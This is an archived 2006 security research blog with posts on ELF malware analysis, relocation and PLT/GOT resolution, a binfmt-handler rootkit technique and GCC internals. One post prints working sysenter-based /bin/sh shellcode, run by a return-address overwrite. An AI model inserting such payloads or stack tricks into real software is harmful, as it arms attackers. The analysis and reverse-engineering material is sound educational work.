EM_386: 2006

Sunday, December 10, 2006

A Vulnerability Renaissance

After a conversation with a friend of mine, it is my opinion that the security industry is evolving but, like many other technology industries, will repeat its own past in due time. In the early 2000s new techniques for exploiting the traditional vulnerability classes (stack, heap, race, format string) were coming out every few months. Widely deployed applications written in C/C++ have since undergone intense scrutiny to eradicate these vulnerabilities. Thus we don't see a new stack/heap/race/format advisory every day like we did 3 years ago. The ones we do see are complex and obscure enough to evade less skilled code auditors. As an industry we haven't seen a new bug class emerge for quite some time, the latest being the explosion of XSS techniques. In my opinion this is partly due to the nature of attacking software at such a high level: there are just so many more directions to poke in.

How long before we undergo a sort of vulnerability renaissance and new bug classes emerge at lower levels? Will we once again see daily advisories for apache/bind/sendmail/ssh? For those who say it's impossible because of the amount of code auditing performed on these applications, all I can say is look at the past 4-5 years of bugtraq/full-disclosure postings. It took many years to find bug classes in languages that are in some cases older than the researchers who found them.

As a side note I find it quite interesting how just one new bug class that can be easily exploited in C/C++ applications will probably fuel another 5-10 years of security industry revenues. This is because a large percentage of deployed protections will need to be re-evaluated. This possibility should be a wakeup call to anyone working in security: we never know all of the vulnerabilities, and threat/risk models can change overnight with a few lines of code. I personally hope we do witness this renaissance soon. Not only because that would mean it was discovered by someone responsible, with enough brains to make us all aware, but also because history has taught us it is inevitable and I would like to see it sooner rather than later (this makes the classic assumption that the bad guys may already possess this knowledge and be using it to their advantage). This possibility should further fuel our progression towards proactive security defenses, as reactive systems have shown us they can't protect you from tomorrow's bugs. Memory protection techniques (ASLR, NX, etc.) are a step in the right direction. But we don't know what tomorrow will bring. And that's my security rant for the day.

Saturday, December 02, 2006

The Art of Software Security Assessment Review

The Art of Software Security Assessment arrived yesterday and I have been furiously taking it in. I'm sure many other people are going to review this book so I will keep it short. This book rocks for a couple of reasons.

#1 The authors. It's the same reason 'The Shellcoder's Handbook' was such a success. You need people with real world experience writing this kind of stuff.

#2 The level of detail. This book goes very deep, especially the chapter on C language vulnerabilities. Mark Dowd was nice enough to release this chapter last month before the book's release. I read that chapter as a PDF last month; it covered signed/unsigned variable issues better than any book I have ever read. Most books go about as deep as strcpy(). It's the obscure details of specific languages and operating systems that make vulnerability hunting so much fun.

#3 Chapter 16 is great. It covers attacking network application protocols. Sometimes it's really hard to explain a protocol's standard and then relate it to attacking its implementation. This time they got it right. READ THIS CHAPTER.

Normally a book that covers everything from specific language details to attacking networking protocols is spread too thin. But these massive 1200 pages cover it perfectly. Now when someone asks me how to get started in my line of work I have an answer: 'Learn an OS's ins and outs, learn a couple of programming languages and read this book cover to cover'. I won't be putting this book on the shelf for a long time.

Sunday, November 26, 2006

Sysenter shellcode

Not much going on tonight. Whipped up some useless shellcode using the sysenter syscall method as opposed to `int 0x80`; nothing new. The size increase over int 0x80 is pretty small too. I have seen some other shellcodes using the 'push ecx, edx, ebp, sysenter' method; this one is a little bit smaller. I wrote it on Ubuntu (Dapper Drake), so the %gs offset may need adjusting on other systems. Here it is:

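static char code[] =
"\x31\xc0"              /* xor %eax, %eax */
"\x50"                  /* pushl %eax (terminates the string) */
"\x68\x2f\x2f\x73\x68"  /* pushl $0x68732f2f ("//sh") */
"\x68\x2f\x62\x69\x6e"  /* pushl $0x6e69622f ("/bin") */
"\x89\xe3"              /* mov %esp, %ebx (ebx = "/bin//sh") */
"\x50"                  /* push %eax (argv[1] = NULL) */
"\x53"                  /* push %ebx (argv[0]) */
"\x89\xe1"              /* mov %esp, %ecx (ecx = argv) */
"\x31\xd2"              /* xor %edx, %edx (envp = NULL) */
"\xb0\x0b"              /* mov $0xb, %al (__NR_execve) */
"\x65\xff\x15\x10";     /* call *%gs:0x10; the three zero displacement bytes
                           are left out and rely on the NUL terminator plus
                           zero bytes following the array */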

__attribute__((noreturn)) int main()
{
int *ret;

ret = (int *)&ret + 2;
(*ret) = (int)code;
}

I wonder how many shellcodes would fail if you disabled the use of the `int 0x80` interrupt from userspace on a honeypot. I can't think of any valid applications that would break, but I'm sure some would. That would be an interesting experiment.

Saturday, October 28, 2006

ELF - No Section Header? No Problem

During the research and development process of some private anti-malware tools of mine I have come to the conclusion that there just isn't enough documentation around on ELF malware analysis. This is obviously because the ratio of PE to ELF malware is probably around 100 to 1. This doesn't mean unix systems don't get infected or attacked on a daily basis. It just means the attacks are either more stealthy or don't occur as often.

Infection techniques are not necessarily what I have been researching. It's more the obfuscation techniques that common malware uses. Just about every ELF monkey has heard of the ELF Kickers suite of tools. One of the utilities that comes with that tarball is sstrip. It's a utility for stripping the section header from an ELF binary. On Linux, the loader and dynamic linker do not require an ELF object of type ET_EXEC to have a section header; only a program header is needed. The removal of the section header is done by changing the ELF header's e_shnum and e_shentsize values to 0 and then stripping or zeroing out the section header itself. Unfortunately ANY tools based on the BFD libraries are hopelessly dependent on the ELF section header. And what's worse, many other open source and commercial tools can be _easily_ fooled by tweaking certain values in the section header (sad but true: most will blindly follow the section header details without stopping to think that's NOT what the OS loader would do!).
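As a rough illustration of "don't blindly trust the section header", here is a minimal sketch of a sanity check a tool could run before using it. The function name `section_headers_usable` is made up for this example, and the extra check on e_shoff is my own assumption about what a careful tool would want; it is not taken from sstrip or BFD.

```c
#include <elf.h>
#include <stddef.h>

/* Hypothetical helper: returns 1 only if the section header table described
 * by the ELF header lies entirely inside a file of file_size bytes. */
int section_headers_usable(const Elf32_Ehdr *eh, size_t file_size)
{
    if (eh->e_shoff == 0 || eh->e_shnum == 0)
        return 0;                       /* stripped, e.g. by sstrip */
    if (eh->e_shentsize != sizeof(Elf32_Shdr))
        return 0;                       /* unexpected entry size */
    if (eh->e_shoff > file_size)
        return 0;                       /* table starts past end of file */
    if ((size_t)eh->e_shnum * eh->e_shentsize > file_size - eh->e_shoff)
        return 0;                       /* table runs past end of file */
    return 1;
}
```

When this returns 0 the tool should fall back to the program header, which is what the OS loader uses anyway.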

Sstripping the section header, and any other dead code in the ELF object, is an obvious no-brainer for a malware author. Not only does it save size but it makes the malware that much harder to analyze. This is nothing new; sstrip has been around for 5 years. Plenty of discussion has raged over this topic. What I find most surprising is the lack of section header rebuilding tools, or tools that completely ignore the section header and parse the ELF object correctly (I am told IDA does this correctly; I do not own a copy). So in this post I present to you the correct way to partially rebuild an ELF section header while grabbing some more interesting data along the way (my example is rebuilding a partial symbol table). I present this information _not_ as something new (like I said before, sstrip is 5 years old now), but as information to help others write better tools in the future.

First off let's assume the ELF object we are analyzing has had its entire section header sstripped away. Let's also assume this binary was compiled with GCC and does have some symbol relocation happening at runtime. The very first thing we want to do is parse the program header for the DYNAMIC segment. Once we have the address of the DYNAMIC segment we want to iterate over that segment using the Elf32_Dyn struct that is defined in /usr/include/elf.h.
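A minimal sketch of that first step, assuming the whole file has been read into a suitably aligned buffer on a little-endian host. The function name `find_dynamic_phdr` is my own, and this is not the code linked later in this post.

```c
#include <elf.h>
#include <stddef.h>
#include <string.h>

/* Returns the PT_DYNAMIC program header of a 32-bit ELF image held in
 * memory, or NULL if the image is malformed or has no dynamic segment. */
const Elf32_Phdr *find_dynamic_phdr(const unsigned char *image, size_t len)
{
    if (len < sizeof(Elf32_Ehdr) || memcmp(image, ELFMAG, SELFMAG) != 0)
        return NULL;

    const Elf32_Ehdr *eh = (const Elf32_Ehdr *)image;
    if (eh->e_ident[EI_CLASS] != ELFCLASS32 ||
        eh->e_phentsize != sizeof(Elf32_Phdr))
        return NULL;

    /* The program header table must lie inside the image. */
    if (eh->e_phoff > len ||
        (size_t)eh->e_phnum * sizeof(Elf32_Phdr) > len - eh->e_phoff)
        return NULL;

    const Elf32_Phdr *ph = (const Elf32_Phdr *)(image + eh->e_phoff);
    for (size_t i = 0; i < eh->e_phnum; i++)
        if (ph[i].p_type == PT_DYNAMIC)
            return &ph[i];
    return NULL;
}
```

The returned entry's p_offset and p_filesz tell you where the array of Elf32_Dyn entries sits in the file and how many of them there can be.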

First let me explain what the dynamic segment holds. In a gcc compiled binary the dynamic segment starts at the .dynamic section. It contains a wealth of values that will help us begin piecing our ELF section header back together. Each dynamic entry stores a different value in the d_tag member of the struct. For example, in our case if dyn->d_tag == DT_REL then dyn->d_un.d_ptr is the start address of a relocation table. In the case of our gcc binary that is probably the .rel.dyn section. Many bits and pieces of the section header can be pieced back together this way. Offsets for sections such as .interp, .ctors, .strtab, .hash, .symtab, .rel.dyn and .rel.plt can be found using the DYNAMIC segment (the string and symbol tables it points at are the dynamic ones, which gcc names .dynstr and .dynsym). Most of these sections will have to be parsed to find their other section header values, such as the size and sh_link members.
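Walking the dynamic entries looks roughly like the sketch below. The helper name `dyn_lookup` and the `max` bound (which you would derive from the segment's p_filesz) are my own choices for illustration.

```c
#include <elf.h>
#include <stddef.h>

/* Walks a dynamic array until DT_NULL (or max entries) looking for tag.
 * On success stores the entry's d_un.d_ptr in *out and returns 1. */
int dyn_lookup(const Elf32_Dyn *dyn, size_t max, Elf32_Sword tag,
               Elf32_Addr *out)
{
    for (size_t i = 0; i < max && dyn[i].d_tag != DT_NULL; i++) {
        if (dyn[i].d_tag == tag) {
            *out = dyn[i].d_un.d_ptr;
            return 1;
        }
    }
    return 0;
}
```

Keep in mind the values you get back are virtual addresses, not file offsets, so they still have to be translated through the PT_LOAD entries before you can seek to them in the file.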

I can't very well end this post without a good example. So here is how to parse the symbol tables of a binary that's been sstripped, using the data from the DYNAMIC segment.

Steps:

#1. Parse the program header to find the DYNAMIC segment
#2. Grab the address of your string table by finding a DYNAMIC segment entry with a d_tag of DT_STRTAB
#3. Grab the address of your symbol table by finding a DYNAMIC segment entry with a d_tag of DT_SYMTAB
#4. Get the number of symbol table entries by reading the nchain value from the hash table, which you can find from the DYNAMIC segment entry with a d_tag of DT_HASH
#5. Loop through the symbol table using the Elf32_Sym struct. Refer to the location of your string table and use the st_name value to find the string that corresponds with the symbol entry you're parsing.
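Steps 4 and 5 can be sketched as follows. This is an illustration written for this walkthrough, not the linked phdr_syms.c; the function names are invented, and the `strsz` bound is assumed to come from the DT_STRSZ dynamic entry. The first helper does the virtual address to file offset translation that steps 2 through 4 need before any table can be read from the file.

```c
#include <elf.h>
#include <stddef.h>
#include <stdio.h>

/* Translates a virtual address from the dynamic segment into a file offset
 * using the PT_LOAD entries. Returns 0 and sets *off on success. */
int vaddr_to_offset(const Elf32_Phdr *ph, size_t phnum, Elf32_Addr va,
                    Elf32_Off *off)
{
    for (size_t i = 0; i < phnum; i++) {
        if (ph[i].p_type == PT_LOAD && va >= ph[i].p_vaddr &&
            va - ph[i].p_vaddr < ph[i].p_filesz) {
            *off = ph[i].p_offset + (va - ph[i].p_vaddr);
            return 0;
        }
    }
    return -1;
}

/* In a DT_HASH table the second word, nchain, equals the number of
 * entries in the dynamic symbol table. */
Elf32_Word dynsym_count(const Elf32_Word *hash)
{
    return hash[1];
}

/* Prints every named symbol and returns how many were printed.
 * strsz bounds st_name so a corrupt entry cannot index past the table. */
size_t dump_symbols(const Elf32_Sym *symtab, Elf32_Word nsyms,
                    const char *strtab, size_t strsz)
{
    size_t printed = 0;
    for (Elf32_Word i = 0; i < nsyms; i++) {
        if (symtab[i].st_name == 0 || symtab[i].st_name >= strsz)
            continue;                   /* unnamed or out of range */
        printf("%08x %s\n", (unsigned)symtab[i].st_value,
               strtab + symtab[i].st_name);
        printed++;
    }
    return printed;
}
```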

http://chris.rohlf.googlepages.com/phdr_syms.c.txt Please go there to find the code that accomplishes steps 1 through 5. I make no guarantee or warranty on this code whatsoever :)

One could easily build upon the code above to find the complete symbol data for a sstripped object by also parsing the relocation tables of the binary: look for dynamic segment entries with a d_tag of DT_JMPREL or DT_REL and use the Elf32_Rel structure. That's all for now though. Thanks for reading.

UPDATE: Cleaned up some errors in the old code; it now uses the hash table's nchain value to find the number of symbols.

Tuesday, October 17, 2006

Nvidia Overflow

This Nvidia driver bug is a nasty one. I looked at the POC code and started thinking about all the different attack vectors for this. Quite scary. Think about it: this is a driver bug that can be reached by manipulating client software (a malicious website, anything that talks to X, etc.). It's about time someone started looking at closed source software on Linux. Much credit to Derek Abdine for this find.

Tuesday, October 10, 2006

Resolving ELF Relocation Name / Symbols

Updated October 4th 2007

I have updated this post to be more accurate as at least 5-10 people a day find it looking for information on ELF relocations/symbols.

From the ELF 1.2 standard:

"Relocation is the process of connecting symbolic references with symbolic definitions. For example, when a program calls a function, the associated call instruction must transfer control to the proper destination address at execution. In other words, relocatable files must have information that describes how to modify their section contents, thus allowing executable and shared object files to hold the right information for a process's program image. Relocation entries are these data."

Each 'call' instruction in your ELF object that calls a function located in a shared object (the function puts() for example) is instead going to call an address in the Procedure Linkage Table (.plt). The PLT is going to resolve the function's real address at runtime. This is because we don't know where the shared library will be loaded in memory at runtime. Let's look at an example ELF object:

Here's a call, from within our .text section, to the location '0x804833c':

$ objdump -d example-elf | grep 804833c | grep call
804843f: e8 f8 fe ff ff call 804833c

Here is our PLT. Notice the address '0x804833c' that was called. It's just a jmp to the location at *0x8049684.

$ objdump -d example-elf | grep "section .plt:" -A 31

Disassembly of section .plt:

080482fc <__gmon_start__@plt-0x10>:
80482fc:       ff 35 70 96 04 08       pushl  0x8049670
8048302:       ff 25 74 96 04 08       jmp    *0x8049674
8048308:       00 00                   add    %al,(%eax)
     ...

0804830c <__gmon_start__@plt>:
804830c:       ff 25 78 96 04 08       jmp    *0x8049678
8048312:       68 00 00 00 00          push   $0x0
8048317:       e9 e0 ff ff ff          jmp    80482fc <_init+0x18>

0804831c <__libc_start_main@plt>:
804831c:       ff 25 7c 96 04 08       jmp    *0x804967c
8048322:       68 08 00 00 00          push   $0x8
8048327:       e9 d0 ff ff ff          jmp    80482fc <_init+0x18>

0804832c <__stack_chk_fail@plt>:
804832c:       ff 25 80 96 04 08       jmp    *0x8049680
8048332:       68 10 00 00 00          push   $0x10
8048337:       e9 c0 ff ff ff          jmp    80482fc <_init+0x18>

0804833c :
804833c:       ff 25 84 96 04 08       jmp    *0x8049684
8048342:       68 18 00 00 00          push   $0x18
8048347:       e9 b0 ff ff ff          jmp    80482fc <_init+0x18>

0804834c :
804834c:       ff 25 88 96 04 08       jmp    *0x8049688
8048352:       68 20 00 00 00          push   $0x20
8048357:       e9 a0 ff ff ff          jmp    80482fc <_init+0x18>

(Remember that the little * means the address stored at 0x8049684.) If we look at what's at 0x8049684 we find an entry in the Global Offset Table (GOT), as shown below.

$ objdump -s example-elf | grep got.plt -A3

Contents of section .got.plt:
804966c 98950408 00000000 00000000 12830408  ................
804967c 22830408 32830408 42830408 52830408  "...2...B...R...

At 0x8049684 we find another address, '42830408', which in little endian is 0x08048342. If you go back up and look at our PLT you will find that 0x8048342 is a push instruction, directly after the first jmp of that PLT entry. It looks like this: "push $0x18". 0x18 (24) is the offset into our relocation table. That is followed by a jmp instruction back to the beginning of our PLT, "jmp 80482fc". You may have noticed the beginning of the PLT looks slightly different than the rest of it. Its first two instructions, "pushl 0x8049670" and "jmp *0x8049674", are important. The first pushes the value stored at 0x8049670 (a slot in our GOT) onto the stack, and the second jumps to the address stored at 0x8049674, which again is in our GOT. Both of those slots are 0x0 in your ELF file because they are filled in at runtime. At runtime the first value will be a number which identifies the particular library being used and the second will be the address of the dynamic linker's symbol resolution routine. That routine uses the offset of 0x18 that was pushed onto the stack earlier to resolve the correct relocation.
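The two bits of arithmetic in that paragraph can be checked with a few lines of C. This is only a sketch; `le32` and `plt_reloc_index` are names I made up, and the division assumes i386 REL-style entries (Elf32_Rel, 8 bytes each).

```c
#include <elf.h>
#include <stddef.h>
#include <stdint.h>

/* Decodes four little-endian bytes, as they appear in `objdump -s` output. */
uint32_t le32(const unsigned char b[4])
{
    return (uint32_t)b[0] | (uint32_t)b[1] << 8 |
           (uint32_t)b[2] << 16 | (uint32_t)b[3] << 24;
}

/* The value pushed by an i386 PLT entry is a byte offset into .rel.plt;
 * dividing by the entry size gives the relocation's index. */
size_t plt_reloc_index(uint32_t pushed_offset)
{
    return pushed_offset / sizeof(Elf32_Rel);
}
```

Feeding it the bytes 42 83 04 08 gives 0x08048342, and the pushed offset 0x18 works out to the fourth entry (index 3) of .rel.plt, which matches that PLT entry being the fourth one in the listing.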

This process is called lazy linking (more commonly, lazy binding), because the relocation is only resolved at runtime when it is first needed. After the first lookup the dynamic linker rewrites the function's GOT entry, so that the next time the PLT entry performs its jmp * it jumps directly to the function instead of falling back into the PLT to push its offset into the relocation table.
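If the mechanism is hard to picture, here is a toy model in plain C. It is not how the dynamic linker is implemented; a function pointer stands in for the GOT slot and every name in it is invented for the illustration.

```c
#include <stdio.h>

typedef int (*func_t)(int);

static int resolver_calls;               /* how often the slow path ran */

static int real_double(int x) { return 2 * x; }   /* the "library" function */

static int lazy_stub(int x);             /* stands in for push + jmp to PLT0 */

/* The "GOT slot": starts out pointing back at the resolver path. */
static func_t got_slot = lazy_stub;

static int lazy_stub(int x)
{
    resolver_calls++;
    got_slot = real_double;              /* the linker patches the GOT entry */
    return got_slot(x);                  /* then transfers to the function */
}

/* The "PLT entry": always an indirect jump through the GOT slot. */
int call_via_plt(int x)
{
    return got_slot(x);
}
```

The first call_via_plt() goes through lazy_stub() and bumps resolver_calls; every later call lands in real_double() directly because the slot has been rewritten.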

Now, how do we get symbol names for relocation entries? After all we want to see 'snprintf' instead of '0x8049688' ...

When a section has type SHT_REL it contains a bunch of structures that look like this:


 typedef struct
 {
      Elf32_Addr r_offset;    /* Address */
      Elf32_Word r_info;    /* Relocation type and symbol index */
 } Elf32_Rel;

Let's look at readelf reading the relocation entries of an ELF object:

$ readelf -r /testbins/sha1


 Relocation section '.rel.dyn' at offset 0x420 contains 3 entries:
 Offset     Info    Type            Sym.Value  Sym. Name
 0804b54c  00001106 R_386_GLOB_DAT    00000000   __gmon_start__
 0804b598  00000505 R_386_COPY        0804b598   stderr
 0804b59c  00000d05 R_386_COPY        0804b59c   stdin

 Relocation section '.rel.plt' at offset 0x438 contains 2 entries:
 Offset     Info    Type            Sym.Value  Sym. Name
 0804b55c  00000107 R_386_JUMP_SLOT   00000000   feof
 0804b560  00000207 R_386_JUMP_SLOT   00000000   putchar

Where do all these entries for each symbol come from?! Offset/Info/Type/Value/Name: I didn't see any of those in that struct! Well, most of these values are going to be pulled from the r_info field, or found by using a value from the r_info field. The offset value (r_offset) is the address of the GOT entry that the relocation patches. If you were to disassemble your binary you would see the matching PLT entry jmp through this address. The field we want to look at here is the r_info field. There are two (well actually three, the third is a combination of 1 and 2) important macros in elf.h we will be using.


 #define ELF32_R_SYM(val) ((val) >> 8)
 #define ELF32_R_TYPE(val) ((val) & 0xff)

Each of these macros is designed to take in the r_info field and output a different result. Let's back up a step. The section header entry that has type SHT_REL (the relocation section we are looking at) has another member called 'sh_link'. This holds an important value. The sh_link value is the index of another section, the one that holds the symbolic information for these relocations, including the function name strings. It is typically the section labeled '.dynsym' by GCC. This is readelf parsing the section header of /bin/ls (cropped for readability).

$ readelf -S /bin/ls

   There are 26 section headers, starting at offset 0x126d8:

 Section Headers:
 [Nr] Name Type Addr Off Size ES Flg Lk Inf Al
 ...
 [ 4] .dynsym DYNSYM 080484a0 0004a0 0006b0 10 A 5 1 4
 ...
 [ 8] .rel.dyn REL 08049170 001170 000028 08 A 4 0 4
 [ 9] .rel.plt REL 08049198 001198 0002f0 08 A 4 11 4
 ...

Notice the sh_link member (the Lk column) of both sections 8 and 9. It's 4, which points us to our dynamic symbol table section. That's where the symbol names that correspond with our relocation entries can be found. So let's recap: #1 scan the section header for a section of type SHT_REL, #2 grab its sh_link member value.
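The recap can be sketched in a few lines, assuming the section header table is intact and already loaded as an array. `next_rel_section` is a name invented for this example.

```c
#include <elf.h>
#include <stddef.h>

/* Returns the index of the first SHT_REL section at or after start and
 * stores its sh_link (the symbol table's section index) in *link.
 * Returns -1 when no further SHT_REL section exists. */
int next_rel_section(const Elf32_Shdr *sh, size_t shnum, size_t start,
                     Elf32_Word *link)
{
    for (size_t i = start; i < shnum; i++) {
        if (sh[i].sh_type == SHT_REL) {
            *link = sh[i].sh_link;
            return (int)i;
        }
    }
    return -1;
}
```

Run against the /bin/ls table above it would report sections 8 and 9, both with a link of 4.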

OK, so where does that leave us? We have a bunch of numbers, but how do we know what matches up where? Well, as we iterate through the relocation table entries we run each r_info value through our ELF32_R_SYM(val) macro and we get a number back. That number is the index of an entry in the dynamic symbol table (or wherever our sh_link member points us to). Parse that entry in the dynamic symbol table and your symbol name will be resolved.
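Put together, the lookup is only a couple of lines. A minimal sketch, assuming the relocation entry, symbol table and string table are already in memory; `reloc_symbol_name` and its bounds parameters are hypothetical.

```c
#include <elf.h>
#include <stddef.h>

/* Resolves the symbol name for one relocation entry. nsyms and strsz bound
 * the lookups; returns NULL if the entry points outside either table. */
const char *reloc_symbol_name(const Elf32_Rel *rel,
                              const Elf32_Sym *symtab, size_t nsyms,
                              const char *strtab, size_t strsz)
{
    size_t idx = ELF32_R_SYM(rel->r_info);   /* index into the symbol table */
    if (idx >= nsyms)
        return NULL;
    if (symtab[idx].st_name >= strsz)
        return NULL;
    return strtab + symtab[idx].st_name;     /* offset into the string table */
}
```

For the .rel.plt entries shown earlier, an r_info of 0x00000107 selects symbol 1 and 0x00000207 selects symbol 2.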

What about the other macro? Well, ELF32_R_TYPE(val) is going to tell us what kind of relocation this is. The possible values are defined in elf.h as R_386_GOT32, R_386_JMP_SLOT and so on. These are very helpful for trying to find out if this relocation is a function or not (it usually is when found in the .rel.plt section).
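Here is a small sketch of using the type macro on the Info values from the readelf listing above. The helper names are made up, and only a handful of the i386 types are mapped.

```c
#include <elf.h>
#include <stdint.h>

/* Maps a few i386 relocation types to the names readelf prints. */
const char *rel_type_name(uint32_t r_info)
{
    switch (ELF32_R_TYPE(r_info)) {
    case R_386_32:       return "R_386_32";
    case R_386_COPY:     return "R_386_COPY";
    case R_386_GLOB_DAT: return "R_386_GLOB_DAT";
    case R_386_JMP_SLOT: return "R_386_JUMP_SLOT";
    case R_386_RELATIVE: return "R_386_RELATIVE";
    default:             return "unknown";
    }
}

/* A relocation of type R_386_JMP_SLOT refers to a function called
 * through the PLT. */
int is_plt_function(uint32_t r_info)
{
    return ELF32_R_TYPE(r_info) == R_386_JMP_SLOT;
}
```

Note that elf.h spells the constant R_386_JMP_SLOT while readelf prints R_386_JUMP_SLOT; they are the same type (7).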

Remember, not all ELF objects will have a section header. In those cases you can use the program header to find and parse the dynamic segment, which will also give you the addresses of your relocation tables, dynamic symbol table and more. If you find any errors in this post, feel free to let me know.

Free BSD Local DOS Bug (IDefense)


Wednesday, October 04, 2006

The Linux Kernel Binary Format Handler (bugs?)

OK, well tonight I read this short paper from shellcode.com.ar. It covers a supposed 'bug' in the Linux kernel ELF loader. It does not report this bug as a vulnerability, and these guys have released some quality content in the past, so I will not immediately toss this one aside with a 'you have to be root...' blah blah. It's true you have to be root to insert a kernel module, which is the technique they used for hijacking the binary loader. The bug can be described very easily: an attacker (who has already gained root access) can hijack the linked list of binary format handlers in the kernel. The default action of the kernel is to check an executable's format at runtime against the newly registered binary format handler before the pre-existing ones. The authors of the paper said from the beginning it was a technique that could be used by a rootkit writer to stay hidden. I for one applaud their work for one simple reason: rootkit detection software now has one more place to look. But that's about it. I'd like to see the kernel check against ELF, a.out and COFF before checking against the newly registered format, but I am a firm believer in a static kernel anyway (I don't enable the ability to load kernel modules on my boxes).
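To make the ordering problem concrete, here is a toy user-space model of the behavior described above. It is not kernel code and none of these names come from the kernel or the paper; it only shows why a handler registered at the front of the list gets first pick of every executable.

```c
#include <stddef.h>
#include <string.h>

/* Toy user-space model, not kernel code: each handler claims a file by
 * inspecting its first bytes, as a binary format handler would. */
struct toy_binfmt {
    const char *name;
    int (*claims)(const unsigned char *head, size_t len);
    struct toy_binfmt *next;
};

static struct toy_binfmt *formats;      /* head of the handler list */

/* New handlers go on the front, so they are consulted first. */
void toy_register_binfmt(struct toy_binfmt *fmt)
{
    fmt->next = formats;
    formats = fmt;
}

/* Returns the first handler that claims the file, or NULL. */
const struct toy_binfmt *toy_search_handler(const unsigned char *head,
                                            size_t len)
{
    for (const struct toy_binfmt *f = formats; f != NULL; f = f->next)
        if (f->claims(head, len))
            return f;
    return NULL;
}

int claims_elf(const unsigned char *head, size_t len)
{
    return len >= 4 && memcmp(head, "\177ELF", 4) == 0;
}

/* A hostile handler can simply claim everything. */
int claims_anything(const unsigned char *head, size_t len)
{
    (void)head;
    (void)len;
    return 1;
}
```

Register the ELF handler and it handles ELF files; register the rogue one afterwards and it sees every executable before the ELF handler does. A detection tool would want to walk the real list and flag handlers it doesn't recognize.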

Friday, September 22, 2006

Obscure GCC Functionality

I spent some time tonight playing around with GCC (v4.0.3-1ubuntu5) function attributes and came across some 'oddness'. Ever use the 'noreturn' attribute? Yeah, me neither. It looks a little something like this:


void test_func() __attribute__((noreturn));

We are basically telling GCC that the function 'test_func()' will not return. Looking at the generated code, this means the compiler emits nothing after 'call test_func()' in the caller: no 'leave', no 'ret', no code to return to. The call instruction still pushes a return address, but it points at whatever happens to sit immediately after the call. Here's some sample C code.


#include <stdio.h>

/* no return attribute */
void test_func() __attribute__((noreturn));

int count = 0;

int main(int argc, char *argv[])
{
    test_func();

    return 0;
}

void test_func()
{
    /*
    A variable to count how many times
    we have been inside this function
    */
    count++;

    printf("count=[%d]\n", count);

    void *ptr1, *ptr2, *ptr3, *ptr4;

    /* test_func() will return to this address */
    ptr1 = __builtin_return_address(0);
    /* main() will return to this address */
    ptr2 = __builtin_return_address(1);
    /* current frame address of test_func() */
    ptr3 = __builtin_frame_address(0);
    /* current frame address of main() */
    ptr4 = __builtin_frame_address(1);

    /* cast for printing; %lx keeps the bare hex format of the output */
    printf("\ntest_func() returns to %lx\n"
           "main() returns to %lx\n"
           "current frame addy of test_func() %lx\n"
           "current frame addy of main() %lx\n\n",
           (unsigned long)ptr1, (unsigned long)ptr2,
           (unsigned long)ptr3, (unsigned long)ptr4);
}

The disassembly listing below confirms that there is no leave/ret instruction after the call. Compare the address called against the output of the program below.


08048360 <main>:
8048360:       55                      push   %ebp
8048361:       89 e5                   mov    %esp,%ebp
8048363:       83 ec 08                sub    $0x8,%esp
8048366:       83 e4 f0                and    $0xfffffff0,%esp
8048369:       b8 00 00 00 00          mov    $0x0,%eax
804836e:       83 c0 0f                add    $0xf,%eax
8048371:       83 c0 0f                add    $0xf,%eax
8048374:       c1 e8 04                shr    $0x4,%eax
8048377:       c1 e0 04                shl    $0x4,%eax
804837a:       29 c4                   sub    %eax,%esp
804837c:       e8 00 00 00 00          call   8048381 <test_func>
              Notice the missing leave/ret instructions

08048381 <test_func>:
8048381:       55                      push   %ebp
8048382:       89 e5                   mov    %esp,%ebp
8048384:       83 ec 28                sub    $0x28,%esp

... rest of test_func() goes here

So when test_func() ends, its ret pops the return address pushed by the call, 0x8048381, which puts us right back at the top of test_func(). The second time through there was no call to push a return address, so the return address slot holds whatever was already on the stack, in this case '1'. Returning to that of course results in a segmentation fault.


./1
count=[1]

test_func() returns to 8048381
main() returns to b7dfbea2
current frame addy of test_func() bf84a888
current frame addy of main() bf84a8a8

count=[2]

test_func() returns to 1
main() returns to b7dfbea2
current frame addy of test_func() bf84a88c
current frame addy of main() bf84a8a8

Segmentation fault (core dumped)

$ gdb -core=core -q
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
Failed to read a valid object file image from memory.
Core was generated by `./1'.
Program terminated with signal 11, Segmentation fault.
#0  0x00000001 in ?? ()
(gdb) info reg
eax            0x87     135
ecx            0x0      0
edx            0x87     135
ebx            0xb7f11adc       -1208935716
esp            0xbf84a894       0xbf84a894
ebp            0xbf84a8a8       0xbf84a8a8
esi            0xbf84a934       -1081824972
edi            0xbf84a8c0       -1081825088
eip            0x1      0x1
eflags         0x210292 2163346
cs             0x73     115
ss             0x7b     123
ds             0x7b     123
es             0x7b     123
fs             0x0      0
gs             0x33     51

At this point we could use the ptrace() API to set the return address correctly, but what's the point? This is of course the correct behavior for GCC. But sometimes it's fun exploring the more obscure side of the most widely used open source compiler.
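For contrast, here is a sketch of the attribute used the way it is meant to be used: on a function that really never returns to its caller. The names are invented for the example, and longjmp() is just one legitimate way to leave (exit() or abort() would do as well).

```c
#include <setjmp.h>

static jmp_buf recover_point;

/* bail() never returns normally: it always leaves through longjmp(). */
static void bail(void) __attribute__((noreturn));

static void bail(void)
{
    longjmp(recover_point, 1);
}

/* Returns 1 after control comes back through longjmp(). Because bail() is
 * declared noreturn, the compiler does not expect a return statement
 * after the call. */
int run_guarded(void)
{
    if (setjmp(recover_point) != 0)
        return 1;           /* reached only via longjmp() from bail() */
    bail();
}
```

Here the promise made to the compiler is actually kept, so leaving out the code after the call is harmless.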

- chris

Thursday, September 21, 2006

Giving in . . .

So I am finally giving in and making a blog . . . Like everyone else in the world. I figure it's a good place to post code and complaints etc...

- chris